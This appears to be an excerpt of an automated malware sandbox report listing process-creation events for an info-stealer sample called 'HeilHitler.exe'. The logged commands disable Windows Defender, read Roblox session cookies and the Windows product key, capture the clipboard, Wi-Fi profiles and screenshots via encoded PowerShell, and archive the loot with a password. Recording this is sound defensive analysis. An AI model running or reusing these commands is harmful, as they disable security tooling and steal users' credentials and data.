              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
